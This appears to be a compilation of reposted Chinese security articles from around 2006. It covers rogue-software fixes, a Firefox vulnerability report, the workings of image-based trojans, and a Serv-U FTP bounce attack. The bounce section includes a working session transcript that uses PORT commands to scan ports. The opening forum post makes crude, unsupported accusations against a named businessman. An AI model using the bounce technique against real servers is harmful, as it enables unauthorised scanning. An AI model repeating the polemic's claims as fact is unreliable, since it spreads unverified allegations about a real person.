透视周鸿祎:周鸿祎的江湖面子,里子及圈子

以下是pcpop论坛的一个帖子,值得阅读:

周弘祎试图让每一个人知道,是他开启了潘多拉的盒子,推出了流氓软件.但是现在我们听到了越来越多担心的声音,周弘祎是否像他承诺的那样,改过自新,关闭盒子.更为普遍的说法是,一直在为一些事情所验证,现在我们从一些例子入手.

不小心跳出来的“百狗”

应该说周弘祎是国内最早发现搜索巨大价值的人士之一,尽管有人说其最早的地址栏搜索概念是剽窃idg透露给其的,他人的商业计划,但其在该项目上的迅速切入并通过病毒式推广所取得的实效,是他人所难企及的.这也奠定了其今后的商业逻辑和手法,那就是不管其起源和进展存在多大的道德质疑,模式漏洞,结果的品牌效应又是如何的千夫所指,只要不择手段的拿到一个结果,然后凭借其财富以及由其公关团队为此衍生出来的冒险精神,商业精明以及快准狠的做事风范,足以抵挡质疑,指责以及可能存在的后果隐患.实际上,一时之效往往是祸根的所在,这里我们暂且不表.



在周弘祎投资的众多项目和公司里,武林榜www.50bang.com是其特别关注的一家.武林榜是一个个人网站流量统计系统,实际负责人是张涛.熟悉周鸿祎的应该知道周对张涛有知遇之恩,而该产品的研发也在周任职雅虎期间秘密完成,这也是题外话.周弘祎对武林榜的重视不在于流量统计,而在于武林榜控制的百狗: www.baigoo.com,实际上熟悉周弘祎风格的人士也可以从那些qihoo,qikoo等命名周氏风格略见一斑.百狗的网站模式明里说是用插件模式来实现的比较搜索的概念,但是实际上更为可观的叫法是“一个强奸百度和google搜索结果的网站”,为什么这么说,也很简单,就是凡是安装百狗插件的电脑,只要在百度和google网站里输入任何一个搜索需求,相关的广告显示即是由百狗提供的广告.换句话讲,就是周弘祎利用百狗的插件,硬生生将百度和 google变成自己的打工者.





为什么一定要先提百狗,因为在其后的一系列事件之中,太多地贯穿在百狗这条主线之上,其开道者,实际上就是周推出的号称替天行道的360插件.到这里,整个事件的大致脉络已经基本浮出水面,那就是大规模的覆盖360插件,在装机容量达到其预期的规模之后,足以对百度和 google广告客户产生吸引的比例之后,高调推出百狗产品,按照其一贯的逻辑思路,我们甚至可以模拟其未来的几步曲:

第一:搜索引擎竞争变局,新兴广告模式彻底颠覆百度.

第二:百狗高调面世,周弘祎三年磨剑

第三:从3721到百狗,周弘祎终成正果

明修栈道,暗渡陈仓;偷梁换柱,李代桃僵.也就是说,当周原来3721式的病毒式强奸插件手段越来越被抨击和鄙夷的时候,周本次采用了病毒式营销插件的推广手法,从强奸网民的电脑,到先用欺骗式的谎言掀起一场互联网空前浩荡的语言暴力大潮,借用上亿网民对原3721插件的痛恨心理,大规模的推广和下载360 新插件,然后再度强奸网民的电脑,日,这不得不说这是周弘祎在几年商海里操作手法的进一步成熟,但同时从一个方面验证,其流氓无耻的德行的进一步加深.

这样一来,我们可以清晰地看清楚所谓的周弘祎反流氓的基本商业逻辑.简单的概括,那就是从强奸网民的电脑到强奸网民的思想,从强奸网民的思想再到强奸网民的电脑.相比原3721插件的强奸式强制安装,360的起始点转为让网民选择自己安装,为达到网民自我安装的目的,胁天子以令诸侯是其采用的手法,也就是利用网民对原3721的仇恨,冠自己正义的名号,树一个千夫所指的靶子,行自己暗中筹划之事.到装机容量达到其预期的规模之后,那好,360预留的后门打开,想卸载,基本已经无法纠缠.所谓用户自觉上贼船,众木已成舟,生米到熟饭,怪只能怪自己傻,周弘祎愚民至此,真可谓机关算尽.

Firefox再现“零时间”攻击新漏洞！

两名黑客周六下午称，开源Firefox Web浏览器在其处理JavaScript的方式上存在严重漏洞。

在出席ToorCon黑客大会的时候，Mischa Spiegelmock和Andrew Wbeelsoi称，通过简单地构造一个包含一些恶意JavaScript代码的Web页面，攻击者可以控制一台运行该浏览器的计算机。该漏洞影响到Windows、Apple计算机的Mac OS X和Linux平台的Firefox。

“每个人都知道，Internet Explorer并不是非常安全。但是Firefox也是相当不安全的，”在博客公司SixApart工作的Spiegelmock说。他同时还透露了这个漏洞的细节信息，并且还播放了一个幻灯片，展示利用该漏洞的攻击代码的关键部分。

Spiegelmock称，该漏洞出现在Firefox的JavaScript的实现过程中。特别是不同的编程技巧可以导致一个堆溢出错误的出现。其实现是一个“完全混乱”的过程，他说道。“这很难去修补。”

Mozilla的安全主管Window Snyder在周六晚上观看了该会议的录像之后，说：“JavaScript的这个问题看上去是一个真正存在的漏洞。他们所描述的可能是一个旧式攻击的变种，我们将对此进行一些研究。”

Snyder对于会议期间针对该漏洞的利用代码的泄漏和发布显得很不高兴。“看上去，在他们的幻灯片中已经为黑客重新该攻击代码提供了足够的信息，”她说道。“我认为这将是很不幸的事情，以为他们将用户至于危险之中，但这可能就是他们的目的所在吧。”

同时，Snyder还称，该会议可能为Mozilla修复该漏洞提供了足够的数据。因为该漏洞好像是存在于浏览器处理JavaScript的部分，解决这个问题可能比常见的修补要困难点。她补充到：“如果它是在一台JavaScript虚拟机上，那么其就不能得到一个快速的修补。”

这两个黑客声称已经掌握了Firefox中30个未打补丁的漏洞，但是他们并不打算将它们公开，而是继续保留这些漏洞。

Mozilla安全雇员Jesse Ruderman参加了这次大会，并被叫上台和这两位黑客进行交流。他试图说服与会者通过Mozilla安全漏洞悬赏奖励计划来披露漏洞，而不是利用这些漏洞来进行非法活动，如创建僵尸网络等等。

新系统最容易中毒 重装系统后十要事

在操作系统进行重新安装后，由于安全设置以及补丁未及时安装等问题，最容易导致病毒的大肆入侵，因此一些必备的补充措施是非常关键的。
　　第1件大事:不要急着接入网络
　　在安装完成Windows后，不要立即把服务器接入网络，因为这时的服务器还没有打上各种补丁，存在各种漏洞，非常容易感染病毒和被入侵。此时要加上冲击波和震撼波补丁后并重新启动再联入互联网。
　　第2件大事:给系统打补丁/安装杀毒软件
　　不用多说，冲击波和震荡波病毒的补丁是一定要打上的，如果你安装了Windows XP SP2则不用再另行安装。
　　安装完系统后，一定要安装反病毒软件，同时将其更新到最新版本。
　　第3件大事:关闭系统还原
　　系统还原是Windows ME和Windows XP、Windows 2003中具有的功能，它允许我们将系统恢复到某一时间状态，从而可以避免我们重新安装操作系统。不过，有的人在执行系统还原后，发现除C盘外，其它的D盘、E盘都恢复到先前的状态了，结果里面保存的文件都没有了，造成了严重的损失!
　　这是由于系统还原默认是针对硬盘上所有分区而言的，这样一旦进行了系统还原操作，那么所有分区的数据都会恢复。因此，我们必须按下Win+Break键，然后单击“系统还原”标签，取消“在所有驱动器上关闭系统还原”选项，然后选中D盘，单击“设置”按钮，在打开的窗口中选中“关闭这个驱动器上的系统还原”选项。
　　依次将其他的盘上的系统还原关闭即可。这样，一旦系统不稳定，可以利用系统还原工具还原C盘上的系统，但同时其他盘上的文件都不会有事。
　　第4件大事:给Administrator打上密码
　　可能有的人使用的是网上下载的万能Ghost版来安装的系统，也可能是使用的是Windows XP无人值守安装光盘安装的系统，利用这些方法安装时极有可能没有让你指定Administrator密码，或者Administrator的密码是默认的123456或干脆为空。这样的密码是相当危险的，因此，在安装完系统后，请右击“我的电脑”，选择“管理”，再选择左侧的“计算机管理(本地)→系统工具→本地用户和组→用户”，选中右侧窗口中的Administrator，右击，选择“设置密码”。
　　在打开窗口中单击“继续”按钮，即可在打开窗口中为Administrator设置密码。
　　另外，选择“新用户”，设置好用户名和密码，再双击新建用户，单击“隶属于”标签，将其中所有组(如果有)都选中，单击下方的“删除”按钮。再单击“添加”按钮，然后再在打开窗口中单击“高级”按钮，接着单击“立即查找”按钮，找到PowerUser或User组，单击“确定”两次，将此用户添加PowerUser或User组。注销当前用户，再以新用户登录可以发现系统快很多。
　　第5件大事:关闭默认共享
　　Windows安装后，会创建一些隐藏共享，主要用于管理员远程登录时管理系统时使用，但对于个人用户来说，这个很少用到，也不是很安全。所以，我们有必要要切断这个共享:先在d:下新建一个disshare.bat文件，在其中写上如下语句:
　　@echo off
　　net share C$/del
　　net share d$/del
　　netshare ipc$/del
　　net share admin$ /del
　　接下来?将d:/disshare.bat拷贝到C:WINDOWSSystem32GroupPolicyUserScriptsLogon文件夹下。然后按下Win+R，输入gpedit.msc，在打开窗口中依次展开“用户配置→Windows设置→脚本(登录/注销)”文件夹，在右侧窗格中双击“登录”项，在弹出的窗口中，单击“添加”命令，选中C:WINDOWSSystem32GroupPolicyUserScriptsLogon文件夹下的disshare.bat文件。
　　完成上述设置后，重新启动系统，就能自动切断Windows XP的默认共享通道了，如果你有更多硬盘，请在net share d$/del下自行添加，如net share e$/del、net share f$/del等。

第6件大事:启用DMA传输模式
　　启用DMA模式之后，计算机周边设备(主要指硬盘)即可直接与内存交换数据，这样能加快硬盘读写速度，提高数据传输速率:打开“设备管理器”，其中“IDE ATA/ATAPI控制器”下有“主要IDE通道”和“次要IDE通道”，双击之，单击“高级设置”，该对话框会列出目前IDE接口所连接设备的传输模式，单击列表按钮将“传输模式”设置为“DMA(若可用)”。重新启动计算机即可生效。
　　第7件大事:启用高级电源管理
　　有时候安装Windows XP之前会发现没有打开BIOS电源中的高级电源控制，安装Windows XP后，关闭Windows时，电源不会自动断开。这时，很多人选择了重新打开BIOS中的高级电源控制，并重新安装Windows XP。事实上，用不着这么麻烦，只要大家确认已经在BIOS中打开高级电源控制选项，同时选择ACPI Pc，一定不要选错，否则重启后可能无法进入Windows，并重新启动电脑，电脑可能会重新搜索并自动重新安装电脑的硬件，之后就可以使其支持高级电源控制了。
　　第8件大事:取消压缩文件夹支持
　　单击开始→运行，输入“regsvr32 /u zipfldr.dll”回车，出现提示窗口“zipfldr.dll中的Dll UnrgisterServer成功”即可取消Windows XP的压缩文件夹支持。另外，输入regsvr32 shdocvw.dll可以取消“图片和传真”与图片文件的关联。
　　第9件大事:取消“磁盘空间不足”通知
　　当磁盘驱动器的容量少于200MB时Windows XP便会发出“磁盘空间不足”的通知，非常烦人。可以打开“注册表编辑器”，定位到HKEY_CURRENT_USERSoftwareMi crosoftWindowsCurrentVersionPolicies Explorer，在“Explorer”上单击右键，选择右键菜单上的“新建”→“DWORD值”，将这个值命名为“NoLowDiskSpaceChecks”，双击该值将其中的“数值数据”设为“1”。
　　第10件大事:启用验证码
　　安装SP2后，大多数用户发现在访问某些需要填写验证码的地方，都无法显示验证码图片(显示为一个红色小叉)，这是一个非常严重的Bug。解决办法为:运行“Regedit”命令打开注册表编辑器，依次定位到“[HKEY_ LOCAL_MACHINESOFTWAREMicrosoftInternet Explorer Security]”，在窗口右边新建一个名为“BlockXBM”的REG_ DWORD值，将其值设置为“0”(十六进制值)。

安全防范：彻底击破威胁你的恶意网页

作者：五月 整理出处：天极安全

1.禁止使用电脑
　　现象描述:尽管网络流氓们用这一招的不多，但是一旦你中招了，后果真是不堪设想!浏览了含有这种恶意代码的网页其后果是:"关闭系统"、"运行"、"注销"、注册表编辑器、DOS程序、运行任何程序被禁止，系统无法进入"实模式"、驱动器被隐藏。
　　解决办法:一般来说上述八大现象你都遇上了的话，基本上系统就给"废"了，建议重装。
　　2.格式化硬盘
　　现象描述:这类恶意代码的特征就是利用IE执行ActiveX的功能，让你无意中格式化自己的硬盘。只要你浏览了含有它的网页，浏览器就会弹出一个警告说"当前的页面含有不安全的ctiveX，可能会对你造成危害"，问你是否执行。如果你选择"是"的话，硬盘就会被快速格式化，因为格式化时窗口是最小化的，你可能根本就没注意，等发现时已悔之晚矣。
　　解决办法:除非你知道自己是在做什么，否则不要随便回答"是"。该提示信息还可以被修改，如改成"Windows正在删除本机的临时文件，是否继续"，所以千万要注意!此外，将计算机上Format.com、Fdisk.exe、Del.exe、Deltree.exe等命令改名也是一个办法。
　　3.下载运行木马程序
　　现象描述:在网页上浏览也会中木马?当然，由于IE5.0本身的漏洞，使这样的新式入侵手法成为可能，方法就是利用了微软的可以嵌入exe文件的eml文件的漏洞，将木马放在eml文件里，然后用一段恶意代码指向它。上网者浏览到该恶意网页，就会在不知不觉中下载了木马并执行，其间居然没有任何提示和警告!
　　解决办法:第一个办法是升级您的IE5.0，IE5.0以上版本没这毛病;此外，安装金山毒霸、Norton等
　　病毒防火墙，它会把网页木马当作病毒迅速查截杀。
　　4. 注册表的锁定
　　现象描述:有时浏览了恶意网页后系统被修改，想要用Regedit更改时，却发现系统提示你没有权限运行该程序，然后让你联系管理员。晕了!动了我的东西还不让改，这是哪门子的道理!
　　解决办法:能够修改注册表的又不止Regedit一个，找一个注册表编辑器，例如:Reghance。将注册表中的HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下的DWORD值"DisableRegistryTools"键值恢复为"0"，即可恢复注册表。
　　5.默认主页修改
　　现象描述:一些网站为了提高自己的访问量和做广告宣传，利用IE的漏洞，将访问者的IE不由分说地进行修改。一般改掉你的起始页和默认主页，为了不让你改回去，甚至将IE选项中的默认主页按钮变为失效的灰色。不愧是网络流氓的一惯做风。
　　解决办法:
　　(1).起始页的修改。展开注册表到HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main，在右半部分窗口中将"Start Page"的键值改为"about:blank"即可。同理，展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main，在右半部分窗口中将"Start Page"的键值改为"about:blank"即可。
　　注意:有时进行了以上步骤后仍然没有生效，估计是有程序加载到了启动项的缘故，就算修改了，下次启动时也会自动运行程序，将上述设置改回来，解决方法如下:
　　运行注册表编辑器Regedit.exe，然后依次展开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run主键，然后将下面的"registry.exe"子键(名字不固定)删除，最后删除硬盘里的同名可执行程序。退出注册编辑器，重新启动计算机，问题就解决了。
　　(2).默认主页的修改。运行注册表编辑器，展开HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\，将Default-Page-URL子键的键值中的那些恶意网站的网址改正，或者设置为IE的默认值。
　　(3).IE选项按钮失效。运行注册表编辑器，将HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel中的DWORD值"Settings"=dword:1、"Links"=dword:1、"SecAddSites"=dword:1全部改为"0"，将HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel下的DWORD值"homepage"的键值改为"0"。

6.篡改IE标题栏
　　现象描述:在系统默认状态下，由应用程序本身来提供标题栏的信息。但是，有些网络流氓为了达到广告宣传的目的，将串值"Windows Title"下的键值改为其网站名或更多的广告信息，从而达到改变IE标题栏的目的。非要别人看他的东西，而且是通过非法的修改手段，除了"无耻"两个字，再没有其它形容词了。
　　解决办法:展开注册表到HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\下，在右半部分窗口找到串值"Windows Title"，将该串值删除。重新启动计算机。
　　7.篡改默认搜索引擎
　　现象描述:在IE浏览器的工具栏中有一个搜索引擎的工具按钮，可以实现网络搜索，被篡改后只要点击那个搜索工具按钮就会链接到网络注氓想要你去的网站。
　　解决办法:运行注册表编辑器，依次展开HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch和HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant,将CustomizeSearch及SearchAssistant的键值改为某个搜索引擎的网址即可。
　　8.IE右键修改
　　现象描述:有的网络流氓为了宣传的目的，将你的右键弹出的功能菜单进行了修改，并且加入了一些乱七八糟的东西，甚至为了禁止你下载，将IE窗口中单击右键的功能都屏蔽掉。
　　解决办法:
　　(1).右键菜单被修改。打开注册表编辑器，找到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt，删除相关的广告条文。
　　(2).右键功能失效。打开注册表编辑器，展开到HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions，将其DWORD值"NoBrowserContextMenu"的值改为0。
　　9.篡改地址栏文字
　　现象描述:中招者的IE地址栏下方出现一些莫名其妙的文字和图标，地址栏里的下拉框里也有大量的地址，并不是你以前访问过的。
　　解决办法:
　　(1).地址栏下的文字。在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ToolBar下找到键值LinksFolderName，将其中的内容删去即可。
　　(2).地址栏中无用的地址。在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypeURLs中删除无用的键值即可。
　　10.启动时弹出对话框
　　现象描述:1.系统启动时弹出对话框，通常是一些广告信息，例如欢迎访问某某网站等等。2.开机弹出网页，通常会弹出很多窗口，让你措手不及，恶毒一点的，可以重复弹出窗口直到死机。
　　解决办法:
　　(1).弹出对话框。打开注册表编辑器，找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon主键，然后在右边窗口中找到"LegalNoticeCaption"和"LegalNoticeText"这两个字符串，删除这两个字符串就可以解决在启动时出现提示框的现象了。
　　(2).弹出网页。点击"开始-运行-输入msconfig",选择"启动"，把里面后缀为url、html、htm的网址文件都勾掉。
　　11.IE窗口定时弹出
　　现象描述:中招者的机器每隔一段时间就弹出IE窗口，地址指向网络注氓的个人主页。不晓得是不是网络流氓以为这样你就会经常光顾?
　　解决办法:点击"开始-运行-输入msconfig",选择"启动"，把里面后缀为hta的都勾掉，重启。

谁是流氓克星 三款软件清理工具分析

谁是流氓克星 三款软件清理工具分析

【编者注】如果评选2006年最受争议的一款国产软件，恐怕没有谁比360安全卫士更受人关注。2006年7月27日，奇虎公司与北京卡巴斯基联手推出“360安全卫士”，并且发起了百日扫毒的义举，对目前横行网络的“流氓软件”公开进行剿灭。此事一出立即激起网络论战，尤其是随着奇虎、雅虎“双虎”口水战的不断升级，360安全卫士更是成为网民关注的焦点。奇虎公司“醉翁之意”何在？360安全卫士是否能真正成为恶意软件的克星？以暴制暴的正义之路究竟能走多久？IT168软件频道将不断关注本次事件并把更多精彩内容为大家一一呈现：
【IT168 软件评测】现在反流氓软件的浪潮已经席卷了互联网的方方面面，从我们个人来说，一旦中了流氓软件的招，一般想到的清理工具一般是360安全卫士、超级兔子和完美卸载等，那么他们各有什么特点优势？为了炼出真金，笔者不惜以身试法来考验一下这三款流氓软件清理工具的能力。

进入查看全文 http://uir.blog.hexun.com/5873298_d.html

被诅咒的油画 图片病毒技术的内幕

被诅咒的油画 图片病毒技术的内幕
作者：五月 整理出处：天极安全

一、被诅咒的油画
　　在网络上流传着一幅诡异的油画，据说很多人看后会产生幻觉，有人解释为油画的构图色彩导致的视觉刺激，也有人认为是心理作用，众说纷纭，却没有令人信服的答案。在网络公司上班的秘书小王也从一个网友那里得知了这幅画，她马上迫不及待的点击了网友给的图片连接。
　　图片出来了，小王终于见识到了传说中诡异的油画，面对着屏幕上那两个看似正常的孩子，她却觉得背后凉飕飕的。那网友也很热心的和她聊这幅画的来源，小王入神的听着，丝毫没有注意到IE浏览器左下角的状态栏打开页面的进度条一直没停止过。
　　如果说小王刚才只是背后发冷的话，那么现在她已经是全身发冷了:电脑光驱自动弹了出来，刚按回去又弹了出来，她着急的请教那个网友，那边很平静的说:“哦，也许是光驱坏了吧，我有事先下了，你找人修一下。”然后头像暗了。
　　小王已经无法回复他的话了:鼠标正在不听使唤的乱跑，键盘也没了反应，过了一会儿，电脑自己重启了，而且永远停留在了“NTLDR is missing...”的出错信息上。
　　显而易见，这又是一个典型的木马破坏事件，但是小王打开的是图片，难道图片也会传播病毒了?答案很简单也很出人意料:小王打开的根本不是图片。
　　IE浏览器的功能很强大，它可以自动识别并打开特定格式的文件而不用在乎它是什么文件后缀名，因为IE对文件内容的判断并不是基于后缀名的，而是基于文件头部和MIME。当用户打开一个文件时，IE读取该文件的头部信息并在本机注册表数据库内查找它对应的MIME格式描述，例如打开一个MIDI文件，IE先读取文件前面一段数据，根据MIDI文件的标准定义，它必须包含以“RIFF”开头的描述信息，根据这段标记，IE在注册表定位找到了“x-audio/midi”的MIME格式，然后IE确认它自己不具备打开这段数据的能力，所以它根据注册表里的文件后缀名信息找到某个已经注册为打开后缀名为“.MID”的文件，然后提交给此程序执行，我们就看到了最终结果。
　　正是因为这个原理，所以IE很容易受伤。入侵者通过伪造一个MIME标记描述信息而使网页得以藏虫，在这里也是相同的道理，小王打开的实际上是一个后缀名改为图片格式的HTML页面，它包含上述两个漏洞的病毒文件和一个高度和宽度都设置为100%的图片IMG标记，所以在小王看来，这只是一个图片文件，然而，图片的背后却是恶毒的木马。木马程序体积都比较大，下载需要一定时间，这就是IE进度条一直没停止的原因。入侵者为了确保受害者打开页面的时间可以使整个木马文件下载完毕，就采用了社会工程学，让受害者不会在很短的时间内关闭页面，当木马下载执行后，“图片”的诅咒就应验了。
　　二、位图特性的悲哀
　　他是一家公司的网络管理员，在服务器维护和安全设置方面有足够多的经验，因此他无需惧怕那些利用浏览器漏洞实现的病毒。这天他在一个技术论坛里看到一个网友发的关于AMD某些型号的处理器存在运算瑕庇的帖子，并给出一个测试页面连接，根据官方描述，如果你用的CPU存在瑕庇，那么你会看到页面上的测试图片显示得破损错乱。他心里一惊:自己用的CPU正是这个型号。他马上点击了页面连接。
　　看着页面上乱七八糟的一幅图片，他心里凉了一截:这台机器的CPU居然有问题，而他还要用这台机器处理公司的重要数据的!他马上去管理部找负责人协商，把显示着一幅胡里花哨图片的机器晾在一边。
　　管理部答应尽快给他更换一台机器，让他把硬盘转移过去，因为上面有重要的业务资料。他回来时看到那幅图片还在耀武扬威，他厌恶的关闭了页面，照例打开存放资料的文件夹，他的脑袋一下子空白了:资料不见了!谁删除了?他慌乱的查找硬盘每个角落，可那些文件却像蒸发了一样。许久，他终于反应过来了:机器被入侵了!他取下硬盘直奔数据恢复公司而去。
　　事后他仔细分析了原因，因为机器已经通过了严格的安全测试而且打了所有补丁，通过网页漏洞和溢出攻击是不可能的了，唯一值得怀疑的只有那个所谓的瑕庇测试网页了，他迅速下载分析了整个页面代码，看着页面源代码里后缀名为“.BMP”的IMG标记和一堆复杂的脚本代码，他知道自己是栽在了BMP木马的手上。
　　那幅“测试瑕庇”的图片，无论到什么机器上都是一样有“瑕庇”，因为它根本不是图片文件，而是一个以BMP格式文件头部开始的木马程序。
　　为什么看似温顺的图片文件也变成了害人的凶器?这要从位图(Bitmap)格式说起，许多朋友应该都知道流传了很久的被称为“图片藏字”的“密文”传播方式，即在位图文件尾部追加一定量的数据而不会对原位图文件造成太大破坏，这是位图格式的限制宽松而造成的。系统判断一个位图文件的方法并不是严格盘查，而是仅仅从文件头部的54字节里读取它的长宽、位数、文件大小、数据区长度就完成了图片的识别，宽松的盘查机制使得BMP木马得以诞生。
　　不过先要澄清一点概念，BMP木马并不是在BMP位图文件屁股后追加的EXE文件，而是一个独立的EXE可执行文件，但是它的文件PE头部已经用位图文件头部替换了，由于系统的盘查机制，这个EXE文件就被浏览器认成位图文件了。既然是位图，在浏览器的程序逻辑里，这是需要下载到Internet高速缓存文件夹然后显示在页面上的文件，但是因为这个文件本来就不是位图，它被强制显示出来以后自然会变成一堆无意义的垃圾数据，在用户眼里，它就成了一幅乱七八糟的图像。但这不是引起木马危机的原因，要留意的是这些文字:“需要下载到Internet高速缓存文件夹”!这说明浏览器已经请狼入室了——木马已经在硬盘上安家了，但是目前它还在沉睡中，因为它的文件头部被改为位图格式，导致它自身已经不能运行，既然不能运行，理所当然就不能对系统构成危害，那么这只狼在硬盘呆多久也是废物一个，入侵者当然不能任由它浪费，因此他们在做个页面给浏览器下载木马的同时，也会设置页面代码让浏览器帮忙脱去这只狼的外衣——把位图格式头部换成可执行文件的PE头部，然后运行它。经过这些步骤，一只恶狼进驻了系统。
　　这个无法修补的漏洞十分可怕，用户很难知道他们正在浏览的页面是否正在偷偷下载着木马数据，因为即使他们打好了所有补丁也无济于事，木马是被IE“合法”下载的，不属于代码漏洞，而且单靠程序本身也很难判断这个图像是不是木马程序，机器靠二进制完成处理工作，而不是视网膜成象交给大脑判断。但是，由于这也是需要下载文件的入侵方式，它能否下载完毕以及用户愿不愿意去看页面就要取决于入侵者的社会工程学了，在任何一个页面里放出一个乱七八糟的图片或者来一个隐藏的图片框都不是最明智的选择，除非利用一些“暇庇声明”或更能引起人的兴趣的伎俩。那家公司的网管之所以会这么不设防，就是因为攻击者偷用了人们的“心理盲区”，因为人们对安全、漏洞、病毒、暇庇等内容会特别敏感，所以入侵者发个专业暇庇案例就欺骗了一大堆人，这次是拿真实的事件:AMD某些型号CPU会导致图像显示出问题的暇庇来做鱼饵，下一次又该拿什么了呢?
　　三、魔鬼的诅咒
　　对于某娱乐论坛的大部分用户来说，今天是个黑色的日子，因为他们在看过一个《被诅咒的眼睛》油画帖子后，系统遭到了不明原因的破坏。
　　论坛管理层的技术人员立即对这个帖子进行了多次分析，可是整个页面就只有一个JPEG图片的连接，其他恶意代码和程序根本不存在。入侵者靠什么破坏了看帖用户的机器?难道竟是这个JPEG图片?
　　答案恐怕让人难以接受，的确就是这幅JPEG图片让用户感染了病毒。尽管病毒研究一直未曾停止，可是发展到这个地步，实在让人不能承受:再下去是不是打开一个文本文件都会被感染病毒?
　　图片带毒来袭，实在让所有人都擦了一把汗，然而我们都知道，JPEG、GIF等格式图片不具备可以执行自身并散播病毒的条件，这不符合逻辑。回忆一下2004年9月14日的事，微软发布了MS04-028安全公告:JPEG处理(GDI+)中的缓冲区溢出可能使代码得以执行。没错，就是这个漏洞，它的术语叫GDI+，对应的动态链接库为GdiPlus.dll，这是一种图形设备接口，能够为应用程序和程序员提供二维媒介图形、映像和版式，大部分Windows程序都调用这个DLL完成JPEG格式图片的处理工作。但是现在，正是这个“公众人物”成了众矢之的。
　　说到这里，有基础的读者应该明白了吧:并不是图片自己能传播病毒，而是系统负责图形处理工作的模块会在处理图片时发生溢出导致图片内携带的恶意指令得以执行破坏。如果某个图片工具不调用这个系统模块，而是使用自己的处理模块，那么同样包含恶意指令的图片就不能达到破坏目的。但是因为这个系统模块是默认的处理模块，所以大部分程序在“JPEG病毒”面前纷纷落马。
　　这个溢出是怎么产生的呢?这要从系统如何读取JPEG格式图形的原理说起，系统处理一个JPEG图片时，需要在内存里加载JPEG处理模块，然后JPEG处理模块再把图片数据读入它所占据的内存空间里，也就是所说的缓冲区，最后我们就看到了图片的显示，然而就是在图片数据进入缓冲区的这一步出了错——Windows规定了缓冲区的大小，却没有严格检查实际容纳的数据量，这个带缺陷的边界检查模式导致了噩梦:入侵者把一个JPEG图片的数据加工得异常巨大并加入恶意指令，那么这个图片在系统载入内存时候会发生什么情况呢?图片数据会涨满整个JPEG处理模块提供的缓冲区并恰好把恶意指令溢出到程序自身的内存区域，而这部分内存区域是用于执行指令的，即核心区，于是恶意指令被程序误执行了，入侵者破坏系统或入侵机器的行为得以正常实施。有人也许会疑惑，入侵者都是神算子吗，他们为什么能准确的知道会是哪些数据可以溢出执行?答案很简单，因为Windows在分配JPEG处理模块的空间时，给它指定的内存起始地址是固定的，入侵者只要计算好这个空间大小，就能知道会有哪些数据被执行了，所以JPEG病毒迅速传播起来。
　　所谓JPEG病毒，并不是JPEG图片能放出病毒，而是系统处理JPEG图片的模块自己执行了JPEG图片携带的病毒，所以我们大可不必人心惶惶，只要补上了GDIPLUS.DLL的漏洞，那么即使你机器上的所有JPEG图片都带有病毒数据，它们也无法流窜出来搞破坏，正如美国马萨诸塞州立大学助理教授奥斯汀所言:“病毒不仅仅是可自我复制的代码，他们需要通过可执行代码的方式来进行传播。JPEG文件不能执行代码，他们是由应用软件打开的数据文件。应用软件不会去查找数据文件中的可执行的代码，为此不会运行这些病毒代码。”
　　四、防范
　　对于虚假图片文件的欺骗手法，只要用户补上了MIME和IFRAME漏洞，那么入侵者让你停留多久也无济于事;至于BMP木马，它的防范是几乎不可避免，但是它有个最大的弱点，大部分情况下只能在Win9x环境正常执行，用Win2000以上的用户不必草木皆兵了;而对于JPEG病毒来说更好办了，微软已经提供JPEG模块的更新了，你倒是去补一下啊!即使真的一点也不会，买个防病毒软件在后台监视也OK了，但是为什么国内用户却偏偏喜欢徒劳的恐慌?
　　纵观这一系列图片病毒的原理和手法，我们可以发现“社会工程学”这个身影的扩大化趋势。如何避免被骗，这只能看你自己了。

Serv-U的反弹攻击及其利用

Serv-U的反弹攻击及其利用

Author：lake2 ( http://lake2.0x54.org )

FTP反弹攻击（FTP Bounce Attack）是很古老的技术了，居然能在我们的信息安全教材上找得到介绍，可见其确实年代久远。

所谓FTP反弹攻击就是利用FTP协议的PORT命令将数据发送到第三方，这样就可以利用FTP服务器实现对其他机器的端口扫描和发送数据了。由于这种攻击的存在，所以FTP服务器一般都限制了PORT命令的ip地址为客户端ip且端口大于1024。

现在比较流行的FTP软件Serv-U默认情况下（似乎？）却没有限制FTP Bounce攻击，造成安全隐患。

以下是对有限制的Serv-U进行反弹攻击：

220-欢迎光临lake2的blog

user lake2

331 User name okay, need password.

pass xxxxxxxxx

230 User logged in, proceed.

port 127,0,0,1,171,182

530 Only client IP address allowed for PORT command.

失败了，因为管理员在设置那里勾上了“拦截FTP Bounce攻击”。

但是，一些Serv-U却可以实现反弹（默认情况下没有阻止FTP Bounce）：

220-欢迎使用本虚拟主机.

user 0x54.org

331 User name okay, need password.

pass xxxxxxxxxxxx

230 User logged in, proceed.

port 127,0,0,1,171,182

200 PORT Command successful.

list

150 Opening ASCII mode data connection for /bin/ls.

226-Maximum disk quota limited to 204800 kBytes

Used disk quota 81766 kBytes, available 123033 kBytes

226 Transfer complete.

port 127,0,0,1,171,183

200 PORT Command successful.

list

150 Opening ASCII mode data connection for /bin/ls.

426-Maximum disk quota limited to 204800 kBytes

Used disk quota 81766 kBytes, available 123033 kBytes

426 Data connection closed, transfer aborted.

命令“port 127,0,0,1,171,182”就是把数据发送到FTP服务器的43958（171*256+182=43958）端口，因为该端口是开放的，所以数据发送成功；第二次把数据发送到43959端口，该端口关闭，所以发送失败。根据返回的结果，就实现了端口扫描（由于限制，只能扫描大于1024的端口）。大名鼎鼎的扫描器NMAP就有利用FTP反弹实现端口扫描的功能。

